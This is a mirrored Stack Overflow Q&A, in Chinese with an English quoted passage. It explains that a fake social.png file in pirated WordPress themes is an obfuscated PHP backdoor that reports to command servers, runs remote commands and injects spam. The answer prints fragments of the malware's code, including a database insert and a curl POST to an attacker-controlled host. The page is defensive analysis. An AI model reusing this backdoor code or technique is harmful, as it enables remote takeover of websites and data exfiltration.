gpt4 book ai didi

php - 许多WordPress主题中奇怪的虚假social.png的目的是什么

转载 作者:行者123 更新时间:2023-12-03 00:51:30 27 4
gpt4 key购买 nike

我从网站下载了一些 Wordpress 主题,并且注意到 social.png 文件中包含一个奇怪的内容。查看这个文件,这不是一个真正的 png 文件,而是一个 php 脚本,其中包含难以理解的混淆代码,并且对于从其他站点分发的许多 WordPress 插件也是如此。

文件大小为 45 kb,哈希值为 3FFC93695CA3C919F36D52D07BDB5B198E7C6D63

有人知道这个文件的功能吗?

THIS是文件

最佳答案

根据this forum post :

Basically, it is a remote shell callback that uses public key encryption to only allow to hacker to run code on your server. It generates a per-install RSA key pair, uploads it to the command server (which it has a preseeded list of, but can dynamically update from other infected hosts to avoid being shut down) using an embedded key and also sends through a list of capabilities (eval/exec enabled, server information) and emails it through to a list of emails found in the file.

It's using Wordpress's config system to store its data, so have a look in your database for a setting key called WP_CLIENT_KEY which will look like a bunch of garbled text.

Once active, the exploit will take a list of commands to eval on the server - probably more shells or exploits, and also inject strings into the page footer. These strings are probably blackhat SEO spam, but it also injects a list of command and control servers that it is on contact with aswell - so any other infected sites will be using your server to find others.

正如我在评论中指出的,该脚本将更新并将数据存储在 WP 数据库中:

$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')");
...

正如论坛帖子所指出的,这是供脚本自己访问的。该脚本还通过 shell POST 请求将数据(可能是公钥)发送到指定的服务器:

curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true);
if (isset($WbKPQMoSbMZkXUeYKXRI)) {
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI);
}

无论脚本的确切目的如何,您都应该删除它的所有引用,并且 attempt to rid yourself of the script completely .

关于php - 许多WordPress主题中奇怪的虚假social.png的目的是什么,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/24967628/

27 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com